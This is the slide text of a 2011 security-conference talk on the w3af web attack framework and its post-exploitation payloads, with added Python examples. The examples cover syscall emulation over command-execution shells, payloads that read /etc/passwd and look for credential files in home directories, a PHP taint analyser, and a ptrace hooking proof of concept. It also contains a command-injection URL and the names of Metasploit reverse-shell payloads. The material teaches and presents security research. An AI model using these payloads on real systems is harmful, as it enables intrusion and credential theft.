Andrés Riancho
Director of Web Security
BlackHat 2011 - Barcelona
Topics
Conclusions
andres@rapid7.com$ whoami
Director of Web Security @ Rapid7
Founder @ Bonsai Information Security
Developer (python!)
Open Source Evangelist
Deep knowledge in networking, design and IPS evasion.
Project leader for w3af
Introduction to w3af
w3af is an open source Web Application Attack and Audit Framework
First version released in March 2007
Open Source tool (GPLv2.0) to identify and exploit Web vulnerabilities
Architecture supports plug-ins (easily extensible)
Available for free download @ www.w3af.org
Code Swarm
GUI demo
This is how it looks
[screenshot slides; recoverable labels: Vuln!, 2 hours, 3 hours, 6 hours]
The reasons
Exploitation frameworks are focused on memory corruption exploits because those were the most important vulnerability class.
Attention has now shifted to Web applications, which are different because they only allow us, depending on the vulnerability, to interact with the system in a particular way:
Read a file
Write a file
Control a section of a SQL query
Execute user controlled source code
Execute operating system commands
[diagram: read(); File upload -> write() (often restricted to a specific directory)]
Exported Syscalls
  read()
  read()
  OS Commanding: execute()
  DAV Shell: write(), execute(), read(), unlink()
  File Upload: write(), execute(), read(), unlink()
Emulating syscalls
Syscall emulation is easy in some cases; for example, read() is emulated by executing "cat filename" or "type filename", depending on the OS:
[diagram: Knowledge -> read() -> Parse]
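As an added illustration of the read()-on-top-of-execute() emulation just described (this is example code, not w3af's own shell classes): a shell that only has execute() gets a read() that runs "cat" or "type" depending on the target OS and returns the command output as the file contents. FakeExecShell and FAKE_FS are constructed stand-ins that answer from memory so the example runs offline; the class and method names are assumptions.

```python
import shlex

# Constructed sample files the fake shell can serve, keyed per target OS.
FAKE_FS = {
    "linux": {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                             "alice:x:1000:1000::/home/alice:/bin/bash\n"},
    "windows": {r"C:\boot.ini": "[boot loader]\r\ntimeout=30\r\n"},
}


class FakeExecShell:
    """Stand-in for an OS-commanding shell: its only primitive is execute().
    It answers from FAKE_FS instead of sending commands to a live target."""

    def __init__(self, os_name):
        self.os_name = os_name
        self.sent = []                      # every command handed to execute()

    def execute(self, command):
        self.sent.append(command)
        cmd, _, arg = command.partition(" ")
        if cmd not in ("cat", "type"):      # the fake only knows how to dump files
            return ""
        filename = arg.strip().strip("'\"")
        return FAKE_FS[self.os_name].get(filename, "")


class EmulatedReadShell:
    """Adds read() on top of an execute()-only shell, choosing the file-dumping
    command by target OS and quoting the name so it is passed as one argument."""

    READ_COMMAND = {"linux": "cat", "windows": "type"}

    def __init__(self, exec_shell):
        self.exec_shell = exec_shell

    def read(self, filename):
        os_name = self.exec_shell.os_name
        if os_name == "linux":
            quoted = shlex.quote(filename)  # keeps shell metacharacters literal
        else:
            quoted = '"%s"' % filename      # cmd.exe-style quoting
        command = "%s %s" % (self.READ_COMMAND[os_name], quoted)
        # The command's output is treated as the file contents; an empty
        # result can mean "empty file" or "error", which is the emulation's
        # main weakness compared with a native read().
        return self.exec_shell.execute(command)


if __name__ == "__main__":
    shell = EmulatedReadShell(FakeExecShell("linux"))
    print(shell.read("/etc/passwd"))
    print(shell.exec_shell.sent)
```

The point of the wrapper is that payloads built on top of it only ever see read(); swapping FakeExecShell for a real exec() shell changes nothing above that line. The empty-output ambiguity is why the slides show a "Parse" step after the emulated read().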
Demo users
Baby steps
users: a payload that reads /etc/passwd and identifies home directories (system call used to read files: read()).
interesting_files: this payload uses the home directories and a list of interesting filenames to search for passwords.
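The two payloads above, chained, as an added example that is not w3af's own payload code: "users" parses /etc/passwd into login-to-home mappings, and "interesting_files" tries a short list of well-known filenames in each home directory. read() is whatever the exploited vulnerability provides; here fake_read and FAKE_FILES are constructed in-memory stand-ins, and the function names are assumptions.

```python
# Filenames the second payload looks for in every home directory (assumed list).
INTERESTING_FILENAMES = (".bash_history", ".netrc", ".my.cnf")

# Constructed sample files the fake read() can return.
FAKE_FILES = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
        "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
        "bob:x:1001:1001:Bob:/home/bob:/bin/zsh\n"
    ),
    "/home/alice/.netrc": "machine db.internal login alice password example-only\n",
    "/root/.bash_history": "ls -la\n",
}


def fake_read(path):
    """Stand-in for the exploit's read(): empty string when the file is absent."""
    return FAKE_FILES.get(path, "")


def users(read):
    """'users' payload: map login -> home directory for accounts that can log in."""
    homes = {}
    for line in read("/etc/passwd").splitlines():
        fields = line.split(":")
        if len(fields) != 7:              # skip blank or malformed lines
            continue
        login, home, shell = fields[0], fields[5], fields[6]
        if shell.endswith(("nologin", "/false")):
            continue                      # service accounts have no useful home
        homes[login] = home.rstrip("/") or "/"
    return homes


def interesting_files(read, homes, names=INTERESTING_FILENAMES):
    """'interesting_files' payload: try each filename in every home directory
    and keep the ones that came back non-empty."""
    found = {}
    for home in homes.values():
        for name in names:
            path = "%s/%s" % (home, name)
            content = read(path)
            if content:
                found[path] = content
    return found


if __name__ == "__main__":
    homes = users(fake_read)
    print(homes)
    print(sorted(interesting_files(fake_read, homes)))
```

Both payloads take read as a parameter rather than a concrete shell, which is what lets the same code run over a local file read, a DAV shell or an OS-commanding exploit with an emulated read().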
Demo interesting_files
Treasure hunt
Identified vulnerabilities
Remote Web server type (Apache, IIS, etc.)
Remote operating system
Found URLs
Demo get_source_code
w3af integration
w000t!
[diagram: w3af scan -> Identify local file read -> Exploit -> read() -> SCA -> Identify SQLi -> Exploit -> write() / exec()]
SQL Injection
OS Commanding
Arbitrary file read
Remote file inclusion
eval() vulnerabilities
Taint analysis
Taint sources: $_GET[], $_POST[], $_COOKIE[], $_REQUEST[]
SCA output:
Tainted variable $bar created as concatenation of 'ls ' and user controlled variable $_GET['foo']
Tainted variable $bar used as parameter #1 of system() in line 2
Exploit: /filename.php?bar=;ls
SCA output:
Tainted variable $foo declared in line 2, taint source is $_GET['bar']
$foo is now clean for OS Commanding.
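A toy version of the taint tracking behind both SCA outputs above, added here as an illustration and not w3af's SCA implementation: superglobals are sources tainted for every vulnerability class, concatenation and unknown function calls propagate taint, a known sanitizer removes only the class it neutralizes, and a sink reports when an argument is still tainted for the sink's class. The PHP fragments VULNERABLE and SANITIZED are constructed, and the supported subset (one statement per line, no commas inside arguments) is an assumption of this example.

```python
import re

# Vulnerability classes this toy tracker knows; a source is tainted for all of them.
VULN_CLASSES = frozenset({"OS Commanding", "SQL Injection"})
SOURCES = ("$_GET", "$_POST", "$_COOKIE", "$_REQUEST")
# Sanitizer -> the single class it neutralizes (taint for other classes survives).
SANITIZERS = {"escapeshellarg": "OS Commanding", "escapeshellcmd": "OS Commanding",
              "mysql_real_escape_string": "SQL Injection"}
SINKS = {"system": "OS Commanding", "exec": "OS Commanding", "mysql_query": "SQL Injection"}
CALL_RE = re.compile(r"^(\w+)\s*\((.*)\)$", re.S)

# Constructed PHP fragments: the vulnerable pattern from the SCA output above,
# and the same flow with the OS Commanding taint removed by escapeshellarg().
VULNERABLE = """
$foo = $_GET['bar'];
$bar = 'ls ' . $foo;
system($bar);
"""
SANITIZED = """
$foo = escapeshellarg($_GET['bar']);
system('ls ' . $foo);
"""


def split_concat(expr):
    """Split on '.' concatenation operators that are outside quotes and parentheses."""
    parts, cur, depth, quote = [], "", 0, None
    for ch in expr:
        if quote:
            quote = None if ch == quote else quote
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "." and depth == 0:
            parts.append(cur.strip())
            cur = ""
            continue
        cur += ch
    parts.append(cur.strip())
    return parts


def taint_of(expr, env):
    """Set of vulnerability classes `expr` is (still) tainted for."""
    expr = expr.strip()
    parts = split_concat(expr)
    if len(parts) > 1:                       # concatenation propagates taint
        return set().union(*(taint_of(p, env) for p in parts))
    if expr.startswith(SOURCES):             # user controlled input
        return set(VULN_CLASSES)
    call = CALL_RE.match(expr)
    if call:                                 # sanitizer strips its class; other calls pass taint
        return taint_of(call.group(2), env) - {SANITIZERS.get(call.group(1))}
    if expr.startswith("$"):                 # variable: taint recorded at its assignment
        return set(env.get(expr, ()))
    return set()                             # string literal or number


def analyze(php_source):
    """Line-oriented taint tracker for the tiny PHP subset used above. Returns
    SCA-style findings and the final taint set of every assigned variable."""
    env, findings = {}, []
    for lineno, raw in enumerate(php_source.strip().splitlines(), 1):
        line = raw.strip().rstrip(";")
        assign = re.match(r"^\$(\w+)\s*=\s*(.+)$", line)
        if assign:
            var = "$" + assign.group(1)
            env[var] = taint_of(assign.group(2), env)
            if env[var]:
                findings.append("Tainted variable %s declared in line %d (taint: %s)"
                                % (var, lineno, ", ".join(sorted(env[var]))))
            continue
        call = CALL_RE.match(line)
        if call and call.group(1) in SINKS:
            vuln = SINKS[call.group(1)]
            for idx, arg in enumerate(call.group(2).split(","), 1):
                if vuln in taint_of(arg, env):
                    findings.append("Tainted argument #%d of %s() in line %d: %s"
                                    % (idx, call.group(1), lineno, vuln))
    return {"findings": findings, "taint": env}


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE), ("sanitized", SANITIZED)):
        print(label, analyze(src)["findings"])
```

Note that escapeshellarg() only clears the OS Commanding class: $foo stays tainted for SQL Injection, so the same variable reaching mysql_query() would still be reported. That per-class bookkeeping is what the "clean for OS Commanding" wording in the SCA output refers to.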
msf_linux_x86_meterpreter_reverse
msf_windows_meterpreter_reverse_tcp
msf_windows_vncinject_reverse
w3af_agent
Metasploit integration
Completely rewritten as a Web application Payload
Metasploit integration is very simple and is achieved
through the following steps:
1.
2.
3.
4.
w3af agent
The w3af agent allows us to route traffic through the compromised host without any effort.
1.
2.
3.
Demo w3af_agent
Routing traffic through the compromised host
Syscall hooking
Syscall hooking using ptrace() is research in progress, for which we only have a small PoC, but I wanted to explain it here to get feedback and new ideas.
The initial idea we had with Lucas Apa (the main Web application security payload developer) was to create a framework that would hook into a process and forward it over the network to the remote server using the Web application exploit.
Using this method, we would be able to run any software installed on the host running w3af against the remote box. A simple example would be clamav.
Syscall hooking
[diagram: open() -> emulated read()]
# PoC hook in the style of a subterfugue Trick: the Memory helper, the Trick
# base class and the callbefore() signature are that framework's (assumed here);
# self.shell is the w3af exploit shell handed to the trick when it is created.
import Memory
from Trick import Trick

class W3afOpenTrick(Trick):
    # Called before Linux's read() syscall
    def callbefore(self, pid, call, args):
        m = Memory.getMemory(pid)
        arg_mem_addr_path = args[0]
        # args[0] points at the path string in the traced process
        filename = m.get_string(arg_mem_addr_path)
        # Calling the read syscall of one of w3af's exploits
        local_filename = self.shell.download(filename)
        # Write the local copy's path into the first mapped area of the process
        area, area_size = m.areas()[0]
        m.poke(area, local_filename + '\0')
        # Rewrite the syscall in order to read the local file
        return (None, None, None, (area, args[1], args[2]))
Our goal is to make this the standard for automated post-exploitation of Web application vulnerabilities.
plugins/attack/payloads/
core/controllers/vdaemon/
core/controllers/w3afAgent/
core/controllers/payloadTransfer/
http://w3af.svn.sourceforge.net/viewvc/w3af/trunk/
Andrés Riancho
Director of Web Security
General Manager of Rapid7's Web Application Center of Excellence in Buenos Aires
andres_riancho@rapid7.com
Follow me on Twitter @w3af
Thank you!
Web Application Center of Excellence,
Buenos Aires, Argentina